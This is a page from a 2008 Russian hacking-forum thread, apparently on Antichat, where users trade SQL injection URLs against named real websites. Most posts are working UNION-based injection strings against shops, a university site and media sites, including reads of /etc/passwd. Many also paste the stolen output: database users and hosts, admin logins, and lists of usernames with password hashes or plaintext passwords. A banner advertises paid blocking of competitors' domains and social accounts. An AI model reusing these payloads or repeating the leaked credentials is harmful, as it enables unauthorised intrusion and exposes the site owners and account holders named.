Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 687 из 1242

687

Опции темы

Поиск в этой теме

Опции просмотра

#6861

15.11.2008, 14:22

jjokker

Новичок

Регистрация: 19.04.2008

Сообщений: 6

Провел на форуме:
28766

Репутация: 34

Отправить сообщение для jjokker с помощью ICQ

UP !!!
Я вручную сбрутил спустя за 5 минут после публикации твоего поста

))

#6862

15.11.2008, 16:22

jjokker

Новичок

Регистрация: 19.04.2008

Сообщений: 6

Провел на форуме:
28766

Репутация: 34

_http://www.aussiepcshop.com/product_info.php/cPath/44/products_id/161'
_http://woohoo.aussiepcshop.com/phpmyadmin/
_http://payments.aussiepcshop.com/phpmyadmin/index.php
-----------------------------
_http://www.airsideshop.com/product.php?id=316%20order%20by%204+--+
-----------------------------
_http://www.tannenbaumholidayshop.com/store.cfm?SearchType=Cat&Searchterm=11'
-----------------------------
_http://www.knifeshop.com/shop/USER_ARTIKEL_HANDLING_AUFRUF.php?darstellen=1&kat_ aktiv=357&Ziel_ID=4310'&javascript_enabled=true&PE PPERSESS=65df5b010c16ad29aef8f3519684b2f5&w=1366&h =716#Ziel4310
-----------------------------
_http://www.worstpreviews.com/review.php?id=67'
-----------------------------

_http://www.19thcenturyshop.com/apps/catalogitem?id=-496+union+select+1,2,3,4,5,6,concat_ws(0x3a,user,h ost),8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+ mysql.user+limit+6,1/*

_http://www.19thcenturyshop.com/apps/catalogitem?id=-496+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,USER (),VERSION(),DATABASE()),8,9,10,11,12,13,14,15,16, 17,18,19,20,21/*

web@localhost :: 4.0.15-log :: century

_http://www.19thcenturyshop.com/apps/catalogitem?id=-496+union+select+1,2,3,4,5,6,concat_ws(0x3a,user,p assword),8,9,10,11,12,13,14,15,16,17,18,19,20,21+f rom+mysql.user+limit+0,1/*

root::2e4fe35a29f3f92f::herbert
rick::5c96ea97620d605c::
mdcback::43334d0c52429114::backup
florian::2941613d4db7badf::
testuser::7dcda0d57290b453::testpass
florian2::2941613d4db7badf::
flowb::43b140e955182c71::
david::

_http://www.19thcenturyshop.com/apps/catalogitem?id=-496+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,user ,host),8,9,10,11,12,13,14,15,16,17,18,19,20,21+fro m+mysql.user+limit+0,1/*

florian::%
florian2::%
sethh::%
testuser::%
tony::%
flowb::207.22.66.13
replicant::207.22.66.178
david::207.22.66.230
mediatwo::207.22.66.27
mediatwo::207.22.66.71
web::69.7.74.77
david::ats
david::localhost
mdc_sync::localhost
-------------------------------
_http://www.trikeshop.com/shop_details.php?id=270+order+by+10/*
_http://www.trikeshop.com/shop_details.php?id=-270+union+select+1,2,3,4,concat_ws(0x3a3a,VERSION( ),USER(),DATABASE()),6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21/*
4.1.20-log :: 334558_trikeshop@172.16.10.133 :: 334558_trikeshop
_http://www.trikeshop.com/shop_details.php?id=-270+union+select+1,2,3,4,load_file(0x2f6574632f706 173737764),6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21+from+news/*
-------------------------------
_http://www.krsaddleshop.com/jump.jsp?itemType=CATEGORY&itemID=21'&path=1
-------------------------------
_http://www.wowshop.com.ua/index.php?productID=640'
-------------------------------
_http://www.broderbund.com/jump.jsp?itemID=1670'&mainPID=1670&itemType=PRODUC T&path=1%2C2%2C6%2C413&iProductID=1670
-------------------------------
_http://www.the-spontaneity-shop.com/shows/show_details.html?show_id=89+order+by+100/*
_http://www.the-spontaneity-shop.com/shows/show_details.html?show_id=-89+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,c oncat_ws(0x3a3a,VERSION(),DATABASE(),USER()),16,17/*
_http://www.the-spontaneity-shop.com/shows/show_details.html?show_id=-89+union+select+1,2,3,4,5,6,7,8,9,username,passwor d,12,13,14,concat_ws(0x3a3a,VERSION(),DATABASE(),U SER()),16,17+from+user+limit+0,1/*

tomsalinsky:0b37d5345cdb88b60219337856bc0256::slit hy
deborah, 2fe7cec3131fa9662906ecfb2eac8a49::moose
4.1.20::the-spontaneity-shop_com::tom@localhost
--------------------------------
_http://www.dutchtradeshop.com/store/itemDetail.php?itemID=10023'
--------------------------------
_http://www.lobbsfarmshop.com/ShowDetails.asp?id=1794'
--------------------------------
_http://www.astoriapastryshop.com/Product_Des.asp?ProductID=-33+union+select+1,@@VERSION,3,4--#p
_http://www.astoriapastryshop.com/Product_Des.asp?ProductID=-33+union+select+all+1,column_name,table_name,4+fro m+information_schema.columns--#p

_http://www.astoriapastryshop.com/Product_Des.asp?ProductID=-33+OR+1=(SELECT+TOP+1+table_name+FROM+INFORMATION_ SCHEMA.TABLES+WHERE+table_name+NOT+IN+('ProductTbl ~bak',%20'CategoryTbl','CategoryTbltest','Category TypeTbl','CategoryTypeTbltest','emailTBL','emailTb ltest','Order_Details','Order_Detailstest','OrderT bl','OrderTbltest','PricingTbl','PricingTbl~bak',' PricingTblA','PricingTbltest','ProductTbl','Produc tTblA','ProductTbltest','TestTBL','TrayPricingTbl' ,'TreeList_Tmp','sysconstraints','syssegments'))--
http://www.astoriapastryshop.com/Product_Des.asp?ProductID=-33+OR+1=(SELECT+TOP+1+column_name+FROM+INFORMATION _SCHEMA.COLUMNS+WHERE+table_name='OrderTbl'+AND+co lumn_name+NOT+IN+('orderID',%20'Name','Address1',' Address2','City','State','Zip','Country','Phone',' Mobile','Email'))--
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
----------------------------------
_http://www.waltsbikeshop.com/outdoors/products/12/1081%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*/
_http://www.waltsbikeshop.com/outdoors/products/12/10-81%20union%20select%201,2,3,4,concat_ws(0x3a3a,VER SION(),USER(),DATABASE()),6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28/*/

4.1.20::waltben4_walt@localhost::waltben4_publicWe b
_http://www.waltsbikeshop.com/outdoors/products/12/10-81%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%20f rom%20users/*/
_http://www.waltsbikeshop.com/outdoors/products/12/10-81%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%20f rom%20news/*/
_http://www.waltsbikeshop.com/outdoors/products/12/10-81%20union%20select%201,2,3,4,concat_ws(0x3a3a,use r_login,user_password),6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28%20from%20use rs%20limit%200,1/*/

concat_ws(0x3a3a,user_id,user_login,user_password)

2::mdbendel::jgarcia <------ administrator
31::bikeguybob::kyle
44::lindsay::june078
9::dave::dave
10::sarah::lea
14::zach::shannon
16::cortez::cortez
29::shannoncanfield::bikes
30::jds::suckme
31::bikeguybob::kyle
33::mountainbkr14::viper
35::kdp::123
43::jdames::itsugar1
41::rex::theodore
42::cirvin::chrisbirvin
45::david::djszp5
46::mgwvd3::garth131
37::quickfeet18::dave11
40::will.verbarg::02291984

_http://www.waltsbikeshop.com/outdoors/products/12/10-81%20union%20select%201,2,3,4,concat_ws(0x3a3a,use r_id,user_login,user_password),6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%20fr om%20users%20where%20user_id=2/*/
_http://www.waltsbikeshop.com/admin/index.php
---------------------------------
_http://www.graysflowershop.com/view-category.asp?cid=4'
---------------------------------
_http://www.oldsweetshop.com/products.asp?CatID=127'&p=0
---------------------------------
_http://www.bagshop.com/store/cart_pages/gift_certficates.php?ID=4468'
---------------------------------
_http://www.fentonartglass.com/shop/item.asp?item=DS197KI'%20OR%201=@@version--
---------------------------------
_http://www.1stopmarineshop.com/product_info.php?cPath=1607958'&products_id=207944 84
---------------------------------
_http://www.dropshop.com/db/npwd_db_detail.php3?id_producto=51797'
---------------------------------
_http://www.goldenmagnolia.com/deutsch/go.php?kategorieID=130'&no=1
---------------------------------

#6863

15.11.2008, 22:45

~~xibox~~

Banned

Регистрация: 23.08.2006

Сообщений: 18

Провел на форуме:
119097

Репутация: 10

jjokker спасибо -)

#6864

16.11.2008, 03:20

Ponchik

Постоянный

Регистрация: 30.08.2005

Сообщений: 730

Провел на форуме:
6828219

Репутация: 2274

tm.die-webber.com

Код:

http://tm.die-webber.com/tools/?login=narks1%22+UNION+SELECT+1,2,column_name,4,5,6,7,8,9+FROM+information_schema.columns+LIMIT+0,1/*

таблы и пару ячеек

Код:

compteur_visite (compteur,date,time,duree,ip)
tmu_banlist
tmu_boosters
tmu_boostersUpdate
tmu_challengers
tmu_challenges
tmu_players (login,nickname,path,team1,team2,team3,team4,team,update)
tmu_servers
tmu_teams
tmu_tracks
tmu_votes

#6865

16.11.2008, 03:22

Ламоза

Новичок

Регистрация: 26.07.2008

Сообщений: 23

Провел на форуме:
414646

Репутация: 20

Код:

http://www.infn.it/news/newsen.php?id=-390+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/*

PR8 Тиц 650
Все таблицы просмотрел, ничего полезного не нашёл. Может у вас получится.

Последний раз редактировалось Ламоза; 16.11.2008 в 13:39..

#6866

16.11.2008, 07:52

truelamer

Участник форума

Регистрация: 06.11.2007

Сообщений: 143

Провел на форуме:
350782

Репутация: 81

http://at.kz/?p=-1+union+select+1,2,version()/*

5.0.18-log

http://at.kz/?p=-1+union+select+1,2,table_name+from+INFORMATION_SCH EMA.TABLES+limit+16,1/*

есть таблица контент
content

И ВСЕ )))

#6867

16.11.2008, 13:21

bons

Участник форума

Регистрация: 20.12.2007

Сообщений: 295

Провел на форуме:
1777055

Репутация: 347

www.computerworld.com.ua
тИЦ = 130; PR = 5

Код:

http://www.computerworld.com.ua/index_cw.php?in=komi_articles_id&id=-1+union+select+1,2,3,4,5,concat(version(),char(0x3A),database(),char(0x3A),user()),7,8,9,10,11,12,13,14,15/*

version() - 4.1.22-log
database() - comizdat3
user() - comizdat@hosting02.iptelecom.net.ua

Код:

http://www.computerworld.com.ua/index_cw.php?in=komi_articles_id&id=-1+union+select+1,2,3,4,5,concat(login,char(0x3A),password),7,8,9,10,11,12,13,14,15+from+admin+limit+0,1/*

admin:sdbgsbglodstre

-----------------------------------------------------

www.russian.kiev.ua
тИЦ = 230; PR = 4

Код:

http://www.russian.kiev.ua/book.php?id=-1+union+select+version(),2,3,user(),5,6,database(),8,9,10,11--

version() - 5.0.67-log
user() - russian@hosting.colocall.net
database() - russian

есть таблица с паролями:

Код:

http://www.russian.kiev.ua/book.php?id=-1+union+select+concat(user_id,char(0x3A),login,char(0x3A),passwd),2,3,4,5,6,7,8,9,10,11+from+tbl_users+limit+0,1--

17:root:root

форум phpbb, но он не работает

Код:

http://www.russian.kiev.ua/book.php?id=-1+union+select+concat(user_id,char(0x3A),username,char(0x3A),user_password),2,3,4,5,6,7,8,9,10,11+from+phpbb_users+where+user_level=1+limit+0,1--

2:admin_admin:0192023a7bbd73250516f069df18b500

-----------------------------------------------------

www.videotor.com
тИЦ = 30; PR = 1

Код:

http://www.videotor.com/post.php?id_post=-1+union+select+1,2,3,concat(version(),char(0x3A),database(),char(0x3A),user())/*

version() - 5.0.45
database() - videotor_blog
user() - videotor@localhost

Код:

http://www.videotor.com/post.php?id_post=-1+union+select+1,2,3,concat(login,char(0x3A),password)+from+users+limit+0,1/*

Bot:ghbpthdfnbd
Slayer:COUNTer
oleg:ghbpthdfnbd
sergey:kiskis

#6868

16.11.2008, 19:29

~~ThreeD~~

Banned

Регистрация: 25.12.2006

Сообщений: 179

Провел на форуме:
2337678

Репутация: 354

Шопчег. Дисками торгует.

http://www.dirtcheapcds.com.au/viewContent.php?id=-31+union+select+1,2,concat_ws(0x3A3a,version(),dat abase()),4,5/*

4.0.24_Debian-10ubuntu2-log::dirtcheap_db

#6869

16.11.2008, 22:07

MolotSNK

Новичок

Регистрация: 13.11.2008

Сообщений: 6

Провел на форуме:
81432

Репутация: 5

_http://www.info77.org/index.php?catid=-1%20union%20select%20group_concat(version()),22222 2--

#6870

16.11.2008, 22:33

MolotSNK

Новичок

Регистрация: 13.11.2008

Сообщений: 6

Провел на форуме:
81432

Репутация: 5

http://www.spomir.ru/rass/spo_out&action=view_archive&id=-1%20union%20select%201,version(),3,4,5,6,7

Смотрим в хедер)

Страница 687 из 1242

687

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход